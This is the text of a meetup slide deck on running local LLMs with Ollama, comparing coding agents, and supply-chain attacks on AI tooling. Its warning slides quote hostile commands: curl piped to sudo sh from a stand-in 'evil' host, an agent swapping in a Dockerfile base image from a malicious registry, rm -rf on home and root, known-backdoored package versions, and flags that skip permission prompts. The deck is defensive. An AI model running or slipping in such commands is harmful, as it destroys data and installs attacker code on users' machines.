πŸ¦™

Local LLMs,
Agent Tools &
Supply Chain Nightmares

Manuel Gaar Β· PreciPoint AI Meetup Β· May 2026

or: what happens when your autocomplete gets sudo fnord

πŸ“‹

00 Β· Agenda

🏠

Why local?

But "local" doesn't mean "safe":

πŸ¦™

Ollama β€” LLMs as a service, but localhost

$ curl -fsSL https://ollama.com/install.sh | sh
# ^ yes, we'll talk about piping curl to sh later

$ ollama pull qwen3.5:9b
$ ollama pull gemma4:12b

# Chat mode
$ ollama run qwen3.5:9b

# API mode (OpenAI-compatible!)
$ curl http://localhost:11434/v1/chat/completions \
  -d '{"model":"qwen3.5:9b","messages":[{"role":"user","content":"explain WebRTC in 3 sentences"}]}'
πŸ–₯️

My Rig β€” AMD all the way

  • CPU: AMD Ryzen 7 5800X
  • RAM: 64 GB DDR4
  • GPU: Radeon RX 6800 XT (16 GB VRAM)
  • ROCm: natively supported (gfx1030 / RDNA 2)
  • Runs Qwen 3.5:9B and Gemma 4:12B comfortably
# Windows System Environment Variables
# Settings β†’ System β†’ About β†’ Advanced β†’ Environment Variables

OLLAMA_HOST = 127.0.0.1
OLLAMA_FLASH_ATTENTION = 1
OLLAMA_GPU_OVERHEAD = 0
OLLAMA_API_KEY = d3b3a9****...****OUMad
HSA_OVERRIDE_GFX_VERSION = 10.3.0
ROCR_VISIBLE_DEVICES = 0
phife at phife-pc in ~
$ ollama ps
NAME            ID              SIZE     PROCESSOR    CONTEXT    UNTIL
gemma4:latest   c6eb396dbd59    13 GB    100% GPU     131072     5 minutes from now

13 GB model fits entirely in 16 GB VRAM β€” no CPU offload needed.

🐘

The Model Zoo

Qwen 3.5 (9B)

Alibaba's powerhouse. Great coding, multilingual, tool-calling built in. Runs on 8GB VRAM.

OSS Β· Local

Gemma 4 (12B)

Google's latest. Multimodal, strong reasoning, surprisingly good at agentic tasks.

OSS Β· Local

MiniMax M2.5

Chinese dark horse. 10B active params, 230B total MoE. Fastest-climbing on OpenRouter. Strong at agentic coding and tool use.

OSS Β· Cloud*

GPT-OSS (OpenAI)

OpenAI's first open weights since GPT-2. 20B runs on 16GB RAM. Native tool calling, MXFP4 quantized. Apache 2.0.

OSS Β· Local

* MiniMax M2.5 available via Ollama cloud or self-hosted with serious hardware

πŸ› οΈ

Agent Tools β€” making LLMs do things

An LLM alone is just a fancy autocomplete. Agent frameworks give it:

(the guardrails part is... a work in progress)

πŸ€–

Local Agent Stack

OpenClaw / PicoClaw

Created by Peter Steinberger (Austria, ex-PSPDFKit). Now at OpenAI. Project moved to an open-source foundation. 247k+ GitHub stars.

  • OSS coding agent inspired by Claude Code
  • PicoClaw β€” minimal fork, runs on a Raspberry Pi
  • Focused on code: file editing, git, tests, commits
  • No built-in memory β€” add and maintain it yourself
  • Sandboxing available but needs manual setup
  • Browser & web search via skills/MCP
  • Messaging: Telegram, Discord, Slack, WhatsApp, iMessage
  • TTS, STT, image gen available via MCP servers / ClawHub skills β€” not built-in
  • Local Ollama models or cloud providers via API key
  • Complex and heavyweight β€” ~500 MB RAM for the gateway alone, no LLM loaded

Hermes Agent (NousResearch)

Built by Nous Research (US, $70M funded). Founded by Jeff Quesnelle, Karan Malhotra & Teknium. 50k+ GitHub stars in 46 days.

  • Full agentic platform, not just a coding tool
  • 3-layer memory: MEMORY.md + USER.md (system prompt), SQLite FTS5 session search, pluggable providers (Mem0, Hindsight, etc.)
  • Learns reusable skills from completed tasks
  • Native Docker isolation with one config line
  • Dangerous command approval system built in
  • Built-in browser automation, web search & extraction
  • Gateway: Telegram, Discord, Slack, WhatsApp, Signal, Email
  • TTS (9 providers incl. Edge, ElevenLabs, OpenAI, MiniMax)
  • STT via local Whisper, Groq, OpenAI, or Mistral Voxtral
  • Image generation via FAL.ai (8 models incl. FLUX 2, GPT-Image)
  • Local Ollama models or cloud providers via API key
☁️

The Cloud Contenders

Claude Code

Anthropic's terminal agent. Reads your repo, edits files, runs tests. Scarily competent.

Cloud Β· Closed

βœ“ Best code quality (subjective!)

Codex (OpenAI)

OpenAI's answer to Claude Code. Multi-file editing, sandboxed execution.

Cloud Β· Closed

⚑ Sandboxed by default

Gemini CLI

Google's entry. Free tier generous. Works with Gemma locally too. Google-scale search built in.

Cloud Β· Free tier

πŸ” Grounding with Search

βš–οΈ

Local vs Cloud β€” the honest truth

Local (Ollama + OpenClaw)

  • βœ… Full data sovereignty
  • βœ… No API costs
  • βœ… Works offline / air-gapped
  • ❌ Smaller models = less capable
  • ❌ Your GPU, your electricity bill
  • ❌ Limited context window on smaller models

Cloud (Claude Code et al.)

  • βœ… Frontier model intelligence
  • βœ… Web search, MCP, integrations
  • βœ… Zero infra management
  • ❌ Data leaves your machine
  • ❌ Costs add up fast
  • ❌ Rate limits at the worst moment

"Localhost is lava β€” until you realize the cloud is someone else's localhost." β€” the eternal DevOps koan

πŸ“„

The *.md file landscape

every tool invented its own config format β€” in markdown

  • CLAUDE.md β€” Claude Code project context
  • AGENTS.md β€” Linux Foundation "universal" standard
  • GEMINI.md β€” Google Gemini CLI
  • SOUL.md β€” Hermes agent persona & personality
  • MEMORY.md / USER.md β€” Hermes persistent memory
  • SKILL.md β€” portable agent skills (Claude, Codex, Hermes). OpenClaw has ClawHub β€” npm for agent skills, 15k+ published
  • copilot-instructions.md β€” GitHub Copilot
  • …and .cursorrules, .windsurfrules, JULES.md, and counting

The problem: same content, 10 different files, slowly drifting apart in every repo.

The workaround:

# one source of truth, symlinked everywhere
$ ln -sfn ../AGENTS.md .github/copilot-instructions.md
$ ln -sfn ../../AGENTS.md .cursor/rules/main.mdc
# elegant? no. prevents drift? yes.

The bet: AGENTS.md becomes the README.md of agent config. Not because it's best β€” because Linux Foundation gravity wins.

Standards are great. That's why we have so many of them. fnord

πŸ’€

Now the scary part

Supply Chain Attacks on AI Tooling

Remember event-stream? Remember colors.js?

March 2026: LiteLLM β€” the most popular LLM proxy on PyPI (95M downloads/month) β€” was backdoored for 5 hours. Credential harvester, K8s lateral movement, persistent backdoor. The attack started with a compromised security scanner.

"Your vulnerability scanner stole the token that backdoored your AI gateway."
🎯

Attack Vectors

Malicious Model
β†’
ollama pull
β†’
Agent Framework
β†’
shell access
β†’
πŸ’€ game over
πŸ”₯

This is not hypothetical

LiteLLM β€” PyPI backdoor

March 24, 2026. TeamPCP compromised Trivy, stole a PyPI token, and backdoored LiteLLM.

pip install litellm==1.82.8

A .pth file fired on every Python startup β€” no import needed. Harvested SSH keys, cloud creds, K8s secrets. Deployed privileged pods to every node.

Axios β€” npm hijack

March 31, 2026. Compromised maintainer account. Malicious versions published to both latest and legacy tags.

npm install axios@1.14.1

Cross-platform RAT deployed in under 15 seconds. 100M weekly downloads. North Korean state actor (Sapphire Sleet).

npm typosquatting

Ongoing forever. One typo, one crypto miner. 454k malicious packages published to npm in 2025 alone.

npm install olama ← not ollama
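One cheap defense against typosquats is a wrapper that refuses anything not on an explicit allowlist. A toy sketch (the allowlist, function name, and wiring are my own, not a real tool):

```shell
# Toy pre-install gate: only exact, allowlisted package names get through.
# Maintaining the allowlist yourself is the whole point.
ALLOWLIST="ollama axios litellm express"

check_pkg() {
  for ok in $ALLOWLIST; do
    [ "$1" = "$ok" ] && return 0
  done
  printf "blocked: '%s' is not on the allowlist\n" "$1" >&2
  return 1
}

check_pkg olama || echo "caught the typosquat before npm ever ran"
```

Wire it in front of the real command with something like `npmi() { check_pkg "$1" && npm install "$1"; }`.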

The "helpful" agent

"I'll fix your Dockerfile." Agent quietly swaps in:

FROM evil-registry.io/totally-legit-ubuntu:latest

You approve the diff without reading it. Classic.

curl | sh β€” we all do it

curl -fsSL https://install.evil.ai | sudo sh
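If you must run a remote installer, at least split the pipe: download, actually read it, verify, then execute. A minimal gate (the function name is mine; the expected checksum is whatever the vendor publishes out-of-band):

```shell
# Refuse to execute a downloaded script unless its sha256 matches
# the checksum published separately by the vendor.
verify_then_run() {
  script="$1"; expected="$2"
  actual=$(sha256sum "$script" | cut -d' ' -f1)
  if [ "$actual" != "$expected" ]; then
    echo "checksum mismatch for $script -- refusing to run" >&2
    return 1
  fi
  sh "$script"
}

# usage:
#   curl -fsSL https://ollama.com/install.sh -o install.sh
#   less install.sh                      # actually read it
#   verify_then_run install.sh "$PUBLISHED_SHA256"
```

On macOS, swap `sha256sum` for `shasum -a 256`.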

πŸ’£

The YOLO Bomb Shell Flags

every cloud agent ships a "please delete my career" flag

# Claude Code
$ claude --dangerously-skip-permissions
# Bypasses ALL permission prompts. File edits, shell commands, MCP tools.
# Real incident: user lost entire home dir via rm -rf ~/

# Codex CLI
$ codex --dangerously-bypass-approvals-and-sandbox
# Or just: codex --yolo
# Disables approvals AND the sandbox. Full host access.

# Gemini CLI
$ gemini --yolo
# Or mid-session: Ctrl+Y to enable. No undo.
# Can also be set as env var: GEMINI_YOLO_MODE=true

All three agents can read your files, run shell commands, and call APIs. These flags remove the only thing standing between the LLM and sudo rm -rf /.
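If you never want to find out what a YOLO flag does on your machine, a shell function can sit in front of the real binary and reject the dangerous flags. This is my own paranoia wrapper, not a feature of any of these CLIs:

```shell
# Paranoia wrapper: refuse the career-ending flags before they
# ever reach the real CLI. Define one per agent binary you use.
claude() {
  for arg in "$@"; do
    case "$arg" in
      --dangerously-*|--yolo)
        echo "nope: '$arg' is banned on this machine" >&2
        return 1 ;;
    esac
  done
  command claude "$@"
}
```

Drop it in your shell profile; the same pattern covers `codex` and `gemini`.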

YOLO β€” You Only Live Once. Which is exactly how many times you'll run rm -rf ~/ before learning your lesson. fnord

πŸ›‘οΈ

Mitigations β€” what you can actually do

Every pip install is a CVE delivery mechanism. Every ollama pull is a trust exercise. Every SKILL.md is a shell script in a trenchcoat. fnord
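Concretely, the cheapest mitigation is just looking: check whether a known-bad release ever landed in your environment. A quick audit sketch for the LiteLLM incident above (the helper name is mine; the version number is the one from the incident slide):

```shell
# Did the backdoored LiteLLM release end up installed here?
audit_pip() {
  bad="litellm==1.82.8"
  if pip freeze 2>/dev/null | grep -qx "$bad"; then
    echo "COMPROMISED: $bad is installed"
    return 1
  fi
  echo "clean: $bad not found"
}
audit_pip
```

The same grep works against a requirements.txt or a container's frozen deps; pair it with pip's `--require-hashes` mode to keep future pulls pinned.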

🌿

Vibe Coding + Git

Without git

  • Agent rewrites files you didn't ask it to touch
  • "Small refactor" cascades across 15 files
  • YOLO flag deletes something you can't recover
  • You approve diffs without reading them

With git

  • Commit before every agent session
  • Feature branches only β€” agents never touch main
  • git diff before every commit
  • git reset --hard when it all goes wrong
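The "commit before every agent session" bullet can be one muscle-memory function. A sketch (the branch naming and helper name are my convention, not any agent's feature):

```shell
# Checkpoint the repo on a throwaway branch before letting an agent loose.
# Agents never touch main; recovery is just `git checkout main`.
agent_checkpoint() {
  branch="agent/session-$(date +%Y%m%d-%H%M%S)"
  git checkout -q -b "$branch" &&
    git add -A &&
    git commit -q --allow-empty -m "checkpoint: before agent session" &&
    echo "$branch"
}
```

Afterwards, `git diff main...HEAD` shows everything the agent actually did.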

How each agent handles it

Claude Code

Auto checkpoints before every change. Esc+Esc rollback. Refuses force-push to main. Auto-commit via PostToolUse hooks.

Hermes

Built-in checkpoints + /rollback command. Git worktree isolation via -w flag. Per-file restore supported.

OpenClaw

No built-in git safety. Bring your own discipline, your own hooks, your own branch strategy.

Git is not optional in the age of AI agents. It's the seatbelt. fnord

πŸ”’

Agent Isolation β€” config compared

Hermes β€” 5 lines

# ~/.hermes/config.yaml
terminal:
  backend: docker
  persistent_shell: true
  timeout: 180
approvals:
  mode: manual

Read-only root FS, dropped capabilities, namespace isolation β€” all handled automatically.

OpenClaw β€” a bit more involved

# ~/.openclaw/openclaw.json
"agents": { "defaults": {
  "sandbox": {
    "mode": "all",
    "backend": "docker",
    "scope": "session",
    "workspaceAccess": "rw"
  }
}}
# + 3 permission layers to configure:
# agent tools, sandbox tools, network

Sandbox off by default. Network isolated by default. Three permission gates to align manually.

πŸŽͺ

Live Demo

if the demo gods are merciful today

Demo 1 β€” OpenClaw

  • Ollama + Qwen 3.5:9B
  • OpenClaw in the browser
  • Code editing task

Demo 2 β€” Hermes

  • Ollama + Gemma 4:latest
  • Hermes via shell tool
  • Same task, different approach

Then: side-by-side with Claude Code on the same task. Spot the difference.

🧠

TL;DR

The stack

  • Local LLMs are ready for daily use β€” often more practical than reaching for a cloud model
  • Cloud agents are still king for complex refactors and reasoning
  • The best setup is hybrid β€” local for speed and privacy, cloud for heavy lifting
  • Money, API access, and hardware are the cheat code. Otherwise little has really changed: same gold-rush energy as the early internet or the crypto boom

The risks

  • Supply chain security is the next frontier. Treat every model pull with the same suspicion as a Docker pull or an unsolicited email attachment
  • Frontier models are probably safer than open-weights ones, but no model is meaningfully audited anyway, least of all the small ones
  • Breaking changes are the new normal. Expect them weekly, not quarterly
  • Security incidents are more frequent, cascade further, and hit harder than ever

Working with AI agents β€” lessons learned

πŸ”§

How this was built

  • Claude Pro subscription β€” Anthropic's consumer plan
  • Claude Opus 4.6 β€” frontier model, not a local lightweight
  • Claude Code β€” running natively in a Debian WSL shell, isolated workspace
  • Manuel in the loop β€” every slide reviewed, corrected, and iterated on by a human

No PowerPoint, no framework, no browser IDE. Just Claude Code in a terminal, a frontier model, and a human who kept saying "no, rephrase that."

  • ~50 turns of back-and-forth
  • ~1.1M tokens consumed (the model's own estimate)
  • 2x daily rate limit hit
  • ~4 hours including research
  • Web search for every technical claim
  • 22 slides, ~1000 lines of HTML/CSS/JS
  • Zero npm/pip dependencies

The model wrote the code. The human steered the content. Neither would have finished alone.

πŸ“‘

Links & Resources

Questions? (or complaints about this not being PowerPoint)

No models were audited. No SKILL.md was reviewed. YOLO.

No Raspberry Pis, Hetzner VMs, or open-source models were harmed during this exploration. fnord

Disclaimer: this presentation is most likely outdated by the time you watch it. That's the point.